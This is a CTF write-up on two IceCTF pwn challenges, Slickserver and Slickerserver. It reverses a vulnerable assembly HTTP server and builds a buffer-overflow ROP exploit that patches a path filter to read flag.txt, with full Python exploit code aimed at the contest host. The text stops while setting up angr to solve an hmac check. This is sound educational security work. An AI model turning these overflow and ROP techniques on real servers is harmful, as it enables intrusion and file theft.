It’s almost 6 months since the last post, so to keep some good yearly average it’s finally time to write something here. For the last couple of months, most of my spare time went into various CTF challenges. Since I’m very new to CTFs, usually I’m not able to solve top scoring tasks and people familiar with CTFs probably know that challenges with lower score are not really interesting enough to write anything more than a few lines writeup (and there is usually dozens of writeups already published, before I even think about writing something). So this time it might be a bit different since the IceCTF was 2 weeks long, and I could prepare some good writeup before competition ends. I did two pwn tasks, which are actually very similar to each other. First one was initially for 300 points, but the organizers figured out, that it’s easier than they thought, so they lowered score to 140pts and published improved version of the task for 300pts. Description for both tasks was pretty straight forward (number of solves on the picture doesn’t reflect the final results which were 27 and 12 accordingly):



Slickserver

First challenge was called Slickserver and it’s just an easier version of Slick er server. Given binary is a 64bit ELF executable, it’s called “asmttpd” which is probably crossover between words “assembler” and “httpd”. Running executable greets us with below message:

rw @ ubuntu:~$ . / asmttpd asmttpd - 0.4 -emory Usage: . / asmttpd / path / to / directory rw@ubuntu:~$ ./asmttpd asmttpd - 0.4-emory Usage: ./asmttpd /path/to/directory

Symbols were not stripped, so all functions have proper names in IDA. Since the application was written in assembly, finding vulnerable place was rather easy. For further explanations I planned to use hexrays-aided C-pseudocode, but because application was written in assembler, disassembly will be more readable here. Vulnerable place is located inside worker_thread() function (main httpd dispatcher):

00400FDA worker_thread proc near 00400FDA 00400FDA overflowIndicator = qword ptr - 20h 00400FDA payloadPtr = qword ptr - 10h 00400FDA socket = qword ptr - 8 00400FDA 00400FDA mov rbp , rsp 00400FDD sub rsp , 20h 00400FE1 mov [ rbp + payloadPtr ] , 0 00400FE9 mov [ rbp + overflowIndicator ] , 0 00400FF1 mov rdi , 3E8h 00400FF8 sub rsp , rdi ; alloca(1000) 00400FFB mov [ rbp + payloadPtr ] , rsp 00400FFF 00400FFF worker_thread_start : 00400FFF call sys_accept 00401004 mov [ rbp + socket ] , rax 00401008 mov rdi , rax 0040100B call sys_cork 00401010 00401010 worker_thread_continue : 00401010 mov rdi , [ rbp + socket ] 00401014 mov rsi , [ rbp + payloadPtr ] 00401018 mov rdx , 2000h 0040101F call sys_recv ; recv(0x2000) 00401024 cmp rax , 0 00401028 jle worker_thread_close 0040102E push rax ; size of the recv data pushed on the stack 0040102F mov r13 , [ rbp + overflowIndicator ] 00401033 test r13 , r13 00401036 jz short worker_thread_continue_nohook 00401038 mov rdi , [ rbp + payloadPtr ] ; a1 0040103C call hmac 00401041 xor r13 , rax 00401044 jmp r13 00401047 ; --------------------------------------------------------------------------- 00401047 00401047 worker_thread_continue_nohook : 00400FDA worker_thread proc near 00400FDA 00400FDA overflowIndicator = qword ptr -20h 00400FDA payloadPtr = qword ptr -10h 00400FDA socket = qword ptr -8 00400FDA 00400FDA mov rbp, rsp 00400FDD sub rsp, 20h 00400FE1 mov [rbp+payloadPtr], 0 00400FE9 mov [rbp+overflowIndicator], 0 00400FF1 mov rdi, 3E8h 00400FF8 sub rsp, rdi ; alloca(1000) 00400FFB mov [rbp+payloadPtr], rsp 00400FFF 00400FFF worker_thread_start: 00400FFF call sys_accept 00401004 mov [rbp+socket], rax 00401008 mov rdi, rax 0040100B call sys_cork 00401010 00401010 worker_thread_continue: 00401010 mov rdi, [rbp+socket] 00401014 mov rsi, [rbp+payloadPtr] 00401018 mov rdx, 2000h 0040101F call sys_recv ; recv(0x2000) 00401024 cmp rax, 0 00401028 jle worker_thread_close 0040102E push rax ; size of the recv data pushed on the stack 0040102F mov r13, [rbp+overflowIndicator] 00401033 test r13, r13 00401036 jz short worker_thread_continue_nohook 00401038 mov rdi, [rbp+payloadPtr] ; a1 0040103C call hmac 00401041 xor r13, rax 00401044 jmp r13 00401047 ; --------------------------------------------------------------------------- 00401047 00401047 worker_thread_continue_nohook:

So, the application allocates on stack 1000 (0x3E8) bytes for recv() buffer, but then allows to receive 0x2000 bytes, which leads to a buffer overflow, and overwriting of the local variables (and other stuff if you want). Immediately after recv(), it checks if the “overflowIndicator” is different than 0, and if yes it calls mysterious hmac() function on the received data. Result from hmac() xored with “overflowIndicator” is used as a jump target (jmp r13), so it’s more like intentional backdoor than innocent mistake. I’ll not go into hmac() details, because reversing this function is not necessary to solve the problem (however it’s for the second task, so stay tuned). It’s enough to step over it in the debugger and get the value calculated for the given payload, then just xor it with the address that jmp r13 should reach. Xor result will be appended at the end of the payload. So the current payload is (in python):

"A" * 1000 + struct . pack ( '<Q' , ADDRESS ^ HMAC_MAGIC ) "A"*1000 + struct.pack('<Q', ADDRESS ^ HMAC_MAGIC)

At this point it is possible to jump to any address in the process and the task description suggests ROP. Let’s get back to the analysis of worker_thread() function. In the normal situation (without exploit), pseudocode of the function would look like this (it’s not 100% accurate, just rough translation from hexrays with omitted some details):

if ( 1 ! = string_ends_with ( payload, " \r

\r

" ) ) goto worker_thread_400_repsonse ; pathBegin = strchr ( payload, '/' ) ; if ( 0 == pathBegin ) goto worker_thread_400_repsonse ; pathEnd = strchr ( payload, ' ' ) ; if ( 0 == pathEnd ) goto worker_thread_400_repsonse ; strcpy ( payload + payloadLen, directory_path ) ; strcat ( payload + payloadLen, pathBegin ) ; while ( string_remove ( payload + payloadLen, "../" ) ; // then it opens the file, read its content and // send 200 HTTP response with the file content // ... worker_thread_400_repsonse : create_httpError_response ( ( __int64 ) payloadPtr, 400LL ) ; sys_send ( ) ; goto worker_thread_close ; // ... if (1 != string_ends_with(payload, "\r

\r

")) goto worker_thread_400_repsonse; pathBegin = strchr(payload, '/'); if (0 == pathBegin) goto worker_thread_400_repsonse; pathEnd = strchr(payload, ' '); if (0 == pathEnd) goto worker_thread_400_repsonse; strcpy(payload + payloadLen, directory_path); strcat(payload + payloadLen, pathBegin); while (string_remove(payload + payloadLen, "../"); // then it opens the file, read its content and // send 200 HTTP response with the file content // ... worker_thread_400_repsonse: create_httpError_response((__int64)payloadPtr, 400LL); sys_send(); goto worker_thread_close; // ...

The most important part here is probably string_remove() called with the “../” argument, at this point one can assume that the flag file is placed one (or more) levels above the asmttpd root directory. In previous challenges flag was usually in the “flag.txt” file, so let’s assume that the flag is placed in “http_root/../flag.txt” . Now let’s back again to the supposed ROP exploit, ideally it should read flag file and send it back over already opened connection. Sounds good, but the execution of this scenario turned out to be more complicated than it looks. Additionally the binary itself contains some strange unused code, that is probably supposed to be used in the ROP exploit. We’ve (hi @1amtom, @krzywix) spent quite some time trying to use those functions in the ROP chain, but at the end not a single opcode from that part of the executable was used. I’ll paste those functions here, just to have it all in one place:

00400C79 reykjavik proc near 00400C79 pop rax 00400C7A mov r14 , rax 00400C7D push rcx 00400C7E push rdi 00400C7F mov rdi , rsp 00400C82 xor rcx , rcx 00400C85 not rcx 00400C88 cld 00400C89 repne scasb 00400C8B not rcx 00400C8E dec rcx 00400C91 test cx , 0AAAAh 00400C96 jz short trump 00400C98 add r14 , rcx 00400C9B pop rdi 00400C9C pop rcx 00400C9D mov rax , r14 00400CA0 retn 00400CA0 reykjavik endp ; sp-analysis failed 00400CA1 00400CA1 duplicity proc near 00400CA1 mov rsi , 3 00400CA8 mov rdi , [ rbp - 8 ] 00400CAC 00400CAC syndisishiring : 00400CAC dec rsi 00400CAF mov rax , 21h 00400CB6 syscall 00400CB8 jnz short syndisishiring 00400CBA 00400CBA schadenfreude : 00400CBA mov r13 , rsp 00400CBD xor r13 , rdx 00400CC0 ror r13 , 0Ch 00400CC4 pop r12 00400CC6 cmp r12 , r13 00400CC9 jnz short caligula 00400CCB retn 00400CCB duplicity endp ; sp-analysis failed 00400CCC 00400CCC trump : 00400CCC int 3 00400CCD nop 00400CCE 00400CCE caligula : 00400CCE int 3 00400CCF nop 00400CD0 00400CD0 print_rdi proc near 00400CD0 push rdi 00400CD1 push rsi 00400CD2 ; too much code, it just 00400CD2 ; prints the rdi to stdout 00400D4F pop rsi 00400D50 pop rdi 00400D51 retn 00400D51 print_rdi endp 00400C79 reykjavik proc near 00400C79 pop rax 00400C7A mov r14, rax 00400C7D push rcx 00400C7E push rdi 00400C7F mov rdi, rsp 00400C82 xor rcx, rcx 00400C85 not rcx 00400C88 cld 00400C89 repne scasb 00400C8B not rcx 00400C8E dec rcx 00400C91 test cx, 0AAAAh 00400C96 jz short trump 00400C98 add r14, rcx 00400C9B pop rdi 00400C9C pop rcx 00400C9D mov rax, r14 00400CA0 retn 00400CA0 reykjavik endp ; sp-analysis failed 00400CA1 00400CA1 duplicity proc near 00400CA1 mov rsi, 3 00400CA8 mov rdi, [rbp-8] 00400CAC 00400CAC syndisishiring: 00400CAC dec rsi 00400CAF mov rax, 21h 00400CB6 syscall 00400CB8 jnz short syndisishiring 00400CBA 00400CBA schadenfreude: 00400CBA mov r13, rsp 00400CBD xor r13, rdx 00400CC0 ror r13, 0Ch 00400CC4 pop r12 00400CC6 cmp r12, r13 00400CC9 jnz short caligula 00400CCB retn 00400CCB duplicity endp ; sp-analysis failed 00400CCC 00400CCC trump: 00400CCC int 3 00400CCD nop 00400CCE 00400CCE caligula: 00400CCE int 3 00400CCF nop 00400CD0 00400CD0 print_rdi proc near 00400CD0 push rdi 00400CD1 push rsi 00400CD2 ; too much code, it just 00400CD2 ; prints the rdi to stdout 00400D4F pop rsi 00400D50 pop rdi 00400D51 retn 00400D51 print_rdi endp

So, another idea was to patch “../” filter string and return execution to the normal path. Filter string is placed in the .data section, which has RW attributes, so having ROP chain with some write primitive should be enough to proceed with this scenario. I was looking at the output of ROPGadget and throughout the binary in search of some useful gadgets and I found one function that was suitable for my needs:

00400188 string_copy proc near 00400188 push rdi 00400189 push rsi 0040018A push rdx 0040018B push r10 0040018D push r9 0040018F push rbx 00400190 push rcx 00400191 push r8 00400193 mov rcx , rdx 00400196 inc rcx 00400199 cld 0040019A rep movsb 0040019C pop r8 0040019E pop rcx 0040019F pop rbx 004001A0 pop r9 004001A2 pop r10 004001A4 pop rdx 004001A5 pop rsi 004001A6 pop rdi 004001A7 retn 004001A7 string_copy endp 00400188 string_copy proc near 00400188 push rdi 00400189 push rsi 0040018A push rdx 0040018B push r10 0040018D push r9 0040018F push rbx 00400190 push rcx 00400191 push r8 00400193 mov rcx, rdx 00400196 inc rcx 00400199 cld 0040019A rep movsb 0040019C pop r8 0040019E pop rcx 0040019F pop rbx 004001A0 pop r9 004001A2 pop r10 004001A4 pop rdx 004001A5 pop rsi 004001A6 pop rdi 004001A7 retn 004001A7 string_copy endp

To execute arbitrary write the only thing that left is gadget that sets up rdx (length), rsi (source buffer) and rdi (destination buffer) registers and it’s actually part of this function (and not only this, since almost every function in this executable has similar epilogue). So let’s start to thinker ROP chain. At the moment of jmp r13 execution, stack looks like this:

rsp + 0x0000 length of received data rsp + 0x0008 payload ( 0x3E8 bytes ) rsp + 0x03F0 overflowIndicator rsp + 0x03F8 payload pointer rsp + 0x0400 socket rsp + 0x0000 length of received data rsp + 0x0008 payload (0x3E8 bytes) rsp + 0x03F0 overflowIndicator rsp + 0x03F8 payload pointer rsp + 0x0400 socket

So jmp r13 needs to jump to the gadget that will pop first value from the stack (length of received data) and then pop rdx/rsi/rdi and return to the string_copy() function. Data required for ROP:

0x0040010b pop r10 ; pop rdx ; pop rsi ; pop rdi ; ret 0x0060163B filter_prev_dir db '../' , 0 0x0060163E db 0 ;this will be used to overwrite begining of the string 0x0040010b pop r10 ; pop rdx ; pop rsi ; pop rdi ; ret 0x0060163B filter_prev_dir db '../',0 0x0060163E db 0 ;this will be used to overwrite begining of the string

Beginning of the exploit will look like this:

def resetString ( strAddr , defRet ) : ret = '' ret + = struct . pack ( '<Q' , 0x0 ) ret + = struct . pack ( '<Q' , 0x60163E ) # null string ret + = struct . pack ( '<Q' , strAddr ) ret + = struct . pack ( '<Q' , 0x400188 ) # string_copy address ret + = struct . pack ( '<Q' , defRet ) return ret s = socket . create_connection ( ( "slick.vuln.icec.tf" , 6600 ) ) dummy = '/../flag.txt ' + 'SEX' * 333 payload = resetString ( 0x60163B , 0x40106B ) payload + = dummy [ : 1000 - len ( payload ) ] payload + = struct . pack ( '<Q' , 0x40010b ^ HMAC_MAGIC ) s. send ( payload ) print s. recv ( 1024 ) s. close ( ) def resetString(strAddr, defRet): ret = '' ret += struct.pack('<Q', 0x0) ret += struct.pack('<Q', 0x60163E) # null string ret += struct.pack('<Q', strAddr) ret += struct.pack('<Q', 0x400188) # string_copy address ret += struct.pack('<Q', defRet) return ret s = socket.create_connection(("slick.vuln.icec.tf", 6600)) dummy = '/../flag.txt ' + 'SEX'*333 payload = resetString(0x60163B, 0x40106B) payload += dummy[:1000 - len(payload)] payload += struct.pack('<Q', 0x40010b ^ HMAC_MAGIC) s.send(payload) print s.recv(1024) s.close()

HMAC_MAGIC needs to be calculated by the app and filled later. The only thing that requires explanation is resetString(). I’ve put it into function, because I’ll later need to call it few more times to have fully working exploit. For now it’s enough to say that the second argument is the address where the execution resumes, in this case it is right after the “if (1 != string_ends_with(payload, “\r

\r

”))” part (look back at pseudocode of worker_thread()). After resuming execution worker_thread() will look for “/” and ” “ characters to mark beginning and the end of the file path, so it’s good to not have this characters as a part of the ROP chain. With above exploit everything will start collapsing when the application pops the length of the received data from the stack (0x004010C1 pop r11). Instead of popping length, it will pop beggining of “/../flag.txt “ string and it will use it to adjust address of the payload, which will most likely result in access violation. To cope with it I’ve added another value to the ROP chain, which will serve as dummy length:

dummy = '/../flag.txt ' + 'SEX' * 333 payload = resetString ( 0x60163B , 0x40106B ) payload + = struct . pack ( '<Q' , 0x160 ) # dummy length payload + = dummy [ : 1000 - len ( payload ) ] payload + = struct . pack ( '<Q' , 0x40010b ^ HMAC_MAGIC ) dummy = '/../flag.txt ' + 'SEX'*333 payload = resetString(0x60163B, 0x40106B) payload += struct.pack('<Q', 0x160) # dummy length payload += dummy[:1000 - len(payload)] payload += struct.pack('<Q', 0x40010b ^ HMAC_MAGIC)

This dummy length will be used to calculate offset at which worker_thread() concatenates http_root_directory and requested file path, it can be any value between size_of_ROP_chain + path_length and 1000 – length_of_concatenated_path. With this adjustment worker_thread() will successfully proceed with the next steps: removing “../” substrings (already defeated), opening file and building HTTP 200 reply. It won’t continue to sys_send() and sys_sendfile() because it will crash inside the create_http200_response(). This function is responsible for building full HTTP reply inside the payload buffer. Unfortunately part of this buffer was already used for the ROP chain, so current rsp is somewhere inside the payload buffer. This will lead to the situation where HTTP reply will overwrite local variables and return address of create_http200_response(). Body of the create_http200_response() looks like this:

int create_http200_response ( void * a1, __int64 a2, __int64 a3 ) { string_copy ( a1, http_200, 18LL ) ; string_concat ( a1, server_header ) ; string_concat ( a1, range_header ) ; string_concat ( a1, content_length ) ; string_concat_int ( a1, a3 ) ; string_concat ( a1, crlf ) ; add_content_type_header ( ( __int64 ) a1 ) ; string_concat ( a1, crlf ) ; return get_string_length ( a1 ) ; } int create_http200_response(void *a1, __int64 a2, __int64 a3) { string_copy(a1, http_200, 18LL); string_concat(a1, server_header); string_concat(a1, range_header); string_concat(a1, content_length); string_concat_int(a1, a3); string_concat(a1, crlf); add_content_type_header((__int64)a1); string_concat(a1, crlf); return get_string_length(a1); }

To minimize size of the HTTP reply I decided to overwrite some of the strings used in this function, namely:

0x0060164B http_200 db 'HTTP/1.1 200 OK' , 0Dh , 0Ah , 0 0x00601742 server_header db 'Server: asmttpd/0.4-emory' , 0Dh , 0Ah , 0 0x0060175E range_header db 'Accept-Ranges: bytes' , 0Dh , 0Ah , 0 0x0060178B content_length db 'Content-Length: ' , 0 0x0060164B http_200 db 'HTTP/1.1 200 OK',0Dh,0Ah,0 0x00601742 server_header db 'Server: asmttpd/0.4-emory',0Dh,0Ah,0 0x0060175E range_header db 'Accept-Ranges: bytes',0Dh,0Ah,0 0x0060178B content_length db 'Content-Length: ',0

It’s no longer HTTP reply, but built output size doesn’t interfere with the create_http200_response() stack anymore and I’ll get the flag anyway. Full exploit for this challenge:

import struct import socket def resetString ( strAddr , defRet = 0x40010d ) : ret = '' ret + = struct . pack ( '<Q' , 0x0 ) ret + = struct . pack ( '<Q' , 0x60163E ) ret + = struct . pack ( '<Q' , strAddr ) ret + = struct . pack ( '<Q' , 0x400188 ) ret + = struct . pack ( '<Q' , defRet ) return ret #s = socket.create_connection(("127.0.0.1", 6600)) s = socket . create_connection ( ( "slick.vuln.icec.tf" , 6600 ) ) dummy = '/../flag.txt ' + 'SEX' * 333 payload = resetString ( 0x60164B ) payload + = resetString ( 0x601742 ) payload + = resetString ( 0x60175E ) payload + = resetString ( 0x60178B ) payload + = resetString ( 0x60163B , 0x40106B ) payload + = struct . pack ( '<Q' , 0x160 ) payload + = dummy [ : 1000 - len ( payload ) ] payload + = struct . pack ( '<Q' , 0x40010b ^ 0xba393df38f6f8c0f ) s. send ( payload ) print s. recv ( 1024 ) s. close ( ) import struct import socket def resetString(strAddr, defRet = 0x40010d): ret = '' ret += struct.pack('<Q', 0x0) ret += struct.pack('<Q', 0x60163E) ret += struct.pack('<Q', strAddr) ret += struct.pack('<Q', 0x400188) ret += struct.pack('<Q', defRet) return ret #s = socket.create_connection(("127.0.0.1", 6600)) s = socket.create_connection(("slick.vuln.icec.tf", 6600)) dummy = '/../flag.txt ' + 'SEX'*333 payload = resetString(0x60164B) payload += resetString(0x601742) payload += resetString(0x60175E) payload += resetString(0x60178B) payload += resetString(0x60163B, 0x40106B) payload += struct.pack('<Q', 0x160) payload += dummy[:1000 - len(payload)] payload += struct.pack('<Q', 0x40010b ^ 0xba393df38f6f8c0f) s.send(payload) print s.recv(1024) s.close()

And the results:

f:\research\ice2016 > asmttpd_final_easy.py IceCTF { r0p+z3-FTW } f:\research\ice2016>asmttpd_final_easy.py IceCTF{r0p+z3-FTW}

Slickerserver

Second challenge was improved version of the Slickserver, so it’s good to start analysis by comparing interesting parts of both binaries and possibly check if the old exploit still has some use. First change is related to the size of alloca() buffer and maximal recv() size:

Slickserver : 00400FF1 mov rdi , 3E8h 00400FF8 sub rsp , rdi 00400FFB mov [ rbp + payloadPtr ] , rsp 00400FFF ; part of code omitted for readability 00401010 worker_thread_continue : 00401010 mov rdi , [ rbp + socket ] 00401014 mov rsi , [ rbp + payloadPtr ] 00401018 mov rdx , 2000h 0040101F call sys_recv Slickerserver : 00401189 mov rdi , 5E8h 00401190 sub rsp , rdi 00401193 mov [ rbp + payloadPtr ] , rsp 00401197 ; part of code omitted for readability 004011A8 worker_thread_continue : 004011A8 mov rdi , [ rbp + var_8 ] 004011AC mov rsi , [ rbp + payloadPtr ] 004011B0 mov rdx , 5F0h 004011B7 call sys_recv Slickserver: 00400FF1 mov rdi, 3E8h 00400FF8 sub rsp, rdi 00400FFB mov [rbp+payloadPtr], rsp 00400FFF ; part of code omitted for readability 00401010 worker_thread_continue: 00401010 mov rdi, [rbp+socket] 00401014 mov rsi, [rbp+payloadPtr] 00401018 mov rdx, 2000h 0040101F call sys_recv Slickerserver: 00401189 mov rdi, 5E8h 00401190 sub rsp, rdi 00401193 mov [rbp+payloadPtr], rsp 00401197 ; part of code omitted for readability 004011A8 worker_thread_continue: 004011A8 mov rdi, [rbp+var_8] 004011AC mov rsi, [rbp+payloadPtr] 004011B0 mov rdx, 5F0h 004011B7 call sys_recv

In the Slickserver it was 0x3E8 buffer versus 0x2000 receive, and now it is 0x5E8 versus 0x5F0. This isn’t a big problem for my exploit, because I was overwriting only one qword after alloca() buffer anyway. Second change is related to hmac() function and the way how the initial code execution is reached:

Slickserver : 00401038 mov rdi , [ rbp + payloadPtr ] 0040103C call hmac 00401041 xor r13 , rax 00401044 jmp r13 Slickerserver : 004011D0 mov rdi , [ rbp + payloadPtr ] 004011D4 call hmac 004011D9 mov r15 , 0FFFFFFFFDEADDEADh 004011E3 jmp rax Slickserver: 00401038 mov rdi, [rbp+payloadPtr] 0040103C call hmac 00401041 xor r13, rax 00401044 jmp r13 Slickerserver: 004011D0 mov rdi, [rbp+payloadPtr] 004011D4 call hmac 004011D9 mov r15, 0FFFFFFFFDEADDEADh 004011E3 jmp rax

It looks like now hmac() function has to be properly reversed, since the jump is performed to the value returned from this function. Rest of the worker_thread() function seems to be identical. It’s also worth noting that r15 register is now assigned with 0xFFFFFFFFDEADDEAD magic value, let’s see how it’s used across the executable. Quick search in IDA reveals that it’s used in epilogue of almost all functions. For example:

004001CD pop rdi 004001CE cmp r15 , 0FFFFFFFFDEADDEADh 004001D5 jz popitlikeitshot 004001DB retn 00400ED3 popitlikeitshot : 00400ED3 int 3 00400ED4 nop 004001CD pop rdi 004001CE cmp r15, 0FFFFFFFFDEADDEADh 004001D5 jz popitlikeitshot 004001DB retn 00400ED3 popitlikeitshot: 00400ED3 int 3 00400ED4 nop

So, in case of using string_copy() as a write primitive, it will just crash the executable, unless we somehow reset r15 register before executing rest of the ROP chain (or just exploit it in the way the author of the task wanted it to be exploited). I’ve started looking at all r15 assignments, fortunately there are only 4 such places and only one seems to be straight forward to use:

00400E39 sys_clone proc near 00400E39 mov r14 , rdi 00400E3C mov r15 , rsi 00400E3F mov rdi , 4000h 00400E46 call sys_mmap_stack 00400E4B mov rsi , rax 00400E4E mov rdi , 10F11h 00400E55 xor r10 , r10 00400E58 xor r8 , r8 00400E5B xor r9 , r9 00400E5E mov rax , 38h 00400E65 syscall 00400E67 cmp rax , 0 00400E6B jnz short parent 00400E6D push r14 00400E6F mov rdi , r15 00400E72 retn 00400E73 00400E73 parent : 00400E73 retn 00400E73 sys_clone endp 00400E39 sys_clone proc near 00400E39 mov r14, rdi 00400E3C mov r15, rsi 00400E3F mov rdi, 4000h 00400E46 call sys_mmap_stack 00400E4B mov rsi, rax 00400E4E mov rdi, 10F11h 00400E55 xor r10, r10 00400E58 xor r8, r8 00400E5B xor r9, r9 00400E5E mov rax, 38h 00400E65 syscall 00400E67 cmp rax, 0 00400E6B jnz short parent 00400E6D push r14 00400E6F mov rdi, r15 00400E72 retn 00400E73 00400E73 parent: 00400E73 retn 00400E73 sys_clone endp

I decided to give it a try and just modify old exploit to test if sys_clone() r15 reset works. I wanted to be sure that it works before I pursue with hmac() reversing, so I just patched jmp rax to jmp 0x40011C. 0x40011C is an address of the pop rdi/ret gadget, because I need to remove payload length from the stack (exactly the same situation as in first challenge). sys_clone() function require 2 parameters in rsi and in rdi registers, it’s called only from one place in the original executable and I decided to use exactly the same arguments in my ROP. Original call:

0040114A mov rdi , offset worker_thread 00401151 xor rsi , rsi 00401154 call sys_clone 0040114A mov rdi, offset worker_thread 00401151 xor rsi, rsi 00401154 call sys_clone

List of the new addresses used by the exploit:

0x0040011A pop rdx ; pop rsi ; pop rdi ; ret 0x0040011B pop rsi ; pop rdi ; ret 0x004001AF string_copy 0x00401172 worker_thread 0x00400E39 sys_clone 0x00401209 address inside worker_thread where execution resumes 0x006017C0 db 0 ;this will be used to overwrite begining of the string 0x006018E2 server_header db 'Server: asmttpd/0.5-emory' , 0Dh , 0Ah , 0 0x006018FE range_header db 'Accept-Ranges: bytes' , 0Dh , 0Ah , 0 0x0060192B content_length db 'Content-Length: ' , 0 0x006017EB http_200 db 'HTTP/1.1 200 OK' , 0Dh , 0Ah , 0 0x006017DB filter_prev_dir db '../' , 0 0x0040011A pop rdx ; pop rsi ; pop rdi ; ret 0x0040011B pop rsi ; pop rdi ; ret 0x004001AF string_copy 0x00401172 worker_thread 0x00400E39 sys_clone 0x00401209 address inside worker_thread where execution resumes 0x006017C0 db 0 ;this will be used to overwrite begining of the string 0x006018E2 server_header db 'Server: asmttpd/0.5-emory',0Dh,0Ah,0 0x006018FE range_header db 'Accept-Ranges: bytes',0Dh,0Ah,0 0x0060192B content_length db 'Content-Length: ',0 0x006017EB http_200 db 'HTTP/1.1 200 OK',0Dh,0Ah,0 0x006017DB filter_prev_dir db '../',0

At this point payload would look like this:

def resetString ( strAddr , defRet = 0x40011A ) : ret = '' ret + = struct . pack ( '<Q' , 0x0 ) ret + = struct . pack ( '<Q' , 0x6017C0 ) ret + = struct . pack ( '<Q' , strAddr ) ret + = struct . pack ( '<Q' , 0x4001AF ) ret + = struct . pack ( '<Q' , defRet ) return ret dummy = '/../flag.txt ' + 'SEX' * 666 payload = struct . pack ( '<Q' , 0x40011B ) payload + = struct . pack ( '<Q' , 0x0 ) payload + = struct . pack ( '<Q' , 0x401172 ) payload + = struct . pack ( '<Q' , 0x400E39 ) payload + = struct . pack ( '<Q' , 0x40011A ) payload + = resetString ( 0x6018E2 ) payload + = resetString ( 0x6018FE ) payload + = resetString ( 0x60192B ) payload + = resetString ( 0x6017EB ) payload + = resetString ( 0x6017DB , 0x401209 ) payload + = struct . pack ( '<Q' , 0x160 ) payload + = dummy [ : 1512 - len ( payload ) ] payload + = struct . pack ( '<Q' , 0x29A ) def resetString(strAddr, defRet = 0x40011A): ret = '' ret += struct.pack('<Q', 0x0) ret += struct.pack('<Q', 0x6017C0) ret += struct.pack('<Q', strAddr) ret += struct.pack('<Q', 0x4001AF) ret += struct.pack('<Q', defRet) return ret dummy = '/../flag.txt ' + 'SEX'*666 payload = struct.pack('<Q', 0x40011B) payload += struct.pack('<Q', 0x0) payload += struct.pack('<Q', 0x401172) payload += struct.pack('<Q', 0x400E39) payload += struct.pack('<Q', 0x40011A) payload += resetString(0x6018E2) payload += resetString(0x6018FE) payload += resetString(0x60192B) payload += resetString(0x6017EB) payload += resetString(0x6017DB, 0x401209) payload += struct.pack('<Q', 0x160) payload += dummy[:1512 - len(payload)] payload += struct.pack('<Q', 0x29A)

Last value (0x29A) is now just used as an overflow indicator and can be anything different than 0. With patched jmp rax above payload successfully exploits given binary, so it’s time to look at the hmac() internals. I’ve just used Hexrays to convert it to C:

unsigned __int64 hmac ( __int64 * a1 ) { __int64 i = 0LL ; __int64 checksum = 0LL ; do { checksum ^ = a1 [ i ] ; ++ i ; } while ( i ! = 189 ) ; __int64 v5 [ 3 ] ; v5 [ 0 ] = checksum ^ 0x5C5C5C5C5C5C5C5CLL ; v5 [ 1 ] = a1 [ 187 ] ; v5 [ 2 ] = a1 [ 188 ] ; v5 [ 1 ] = murmur1 ( 0xDEFACEDBAADF00DLL, v5, 24LL ) ; v5 [ 0 ] = checksum ^ 0x3636363636363636LL ; return murmur1 ( 0xFACEB00CCAFEBABELL, v5, 16LL ) ; } unsigned __int64 hmac(__int64 *a1) { __int64 i = 0LL; __int64 checksum = 0LL; do { checksum ^= a1[i]; ++i; } while (i != 189); __int64 v5[3]; v5[0] = checksum ^ 0x5C5C5C5C5C5C5C5CLL; v5[1] = a1[187]; v5[2] = a1[188]; v5[1] = murmur1(0xDEFACEDBAADF00DLL, v5, 24LL); v5[0] = checksum ^ 0x3636363636363636LL; return murmur1(0xFACEB00CCAFEBABELL, v5, 16LL); }

a1 is the payload, it’s interpreted as an array of qwords, quick check 189 * sizeof(__int64) = 1512 (0x5E8) gives the exact size of the alloca() buffer. So, hmac() function first xors all 189 qwords from the payload, then it uses calculated value and two last qwords (187, 188) to calculate final result with some murmur1() function:

unsigned __int64 murmur1 ( __int64 a1, __int64 * a2, signed __int64 a3 ) { unsigned __int64 v4 = a1 ^ 0xA165C8277LL * a3 ; if ( a3 > 7 ) { __int64 * v5 = & a2 [ ( ( unsigned __int64 ) ( a3 - 8 ) >> 3 ) + 1 ] ; do { __int64 v6 = * a2 + v4 ; ++ a2 ; v4 = 0xA165C8277LL * v6 ^ ( ( unsigned __int64 ) ( 0xA165C8277LL * v6 ) >> 16 ) ; } while ( a2 ! = v5 ) ; } return 0xA165C8277LL * ( 0xA165C8277LL * v4 ^ ( 0xA165C8277LL * v4 >> 10 ) ) ^ \ ( 0xA165C8277LL * ( 0xA165C8277LL * v4 ^ ( 0xA165C8277LL * v4 >> 10 ) ) >> 17 ) ; } unsigned __int64 murmur1(__int64 a1, __int64 *a2, signed __int64 a3) { unsigned __int64 v4 = a1 ^ 0xA165C8277LL * a3; if (a3 > 7) { __int64* v5 = &a2[((unsigned __int64)(a3 - 8) >> 3) + 1]; do { __int64 v6 = *a2 + v4; ++a2; v4 = 0xA165C8277LL * v6 ^ ((unsigned __int64)(0xA165C8277LL * v6) >> 16); } while (a2 != v5); } return 0xA165C8277LL * (0xA165C8277LL * v4 ^ (0xA165C8277LL * v4 >> 10)) ^ \ (0xA165C8277LL * (0xA165C8277LL * v4 ^ (0xA165C8277LL * v4 >> 10)) >> 17); }

Looking back at the hmac() function (especially xor loop), it’s quite clear that the whole payload can consist of any values, except the last 3 qwords. Last 2 are directly fed to murmur1(), the third from the end will serve as adjustment. Few years ago I would probably sit down and try to reverse this function manually, but we’re now living in the times of SMT solvers and various frameworks that utilize them, so I decided to go with ANGR. I created simple executable that just tries to execute second murmur1() call:

__int64 t2 [ 2 ] = { 0 } ; int main ( ) { if ( 0x40011C == murmur1 ( 0xFACEB00CCAFEBABELL, t2, 16 ) ) printf ( "yuppie XXX!

" ) ; return 0 ; } __int64 t2[2] = { 0 }; int main() { if (0x40011C == murmur1(0xFACEB00CCAFEBABELL, t2, 16)) printf("yuppie XXX!

"); return 0; }

t2 has only 2 qwords, because third argument is the size of the t2 in bytes. Then I run this executable through ANGR script:

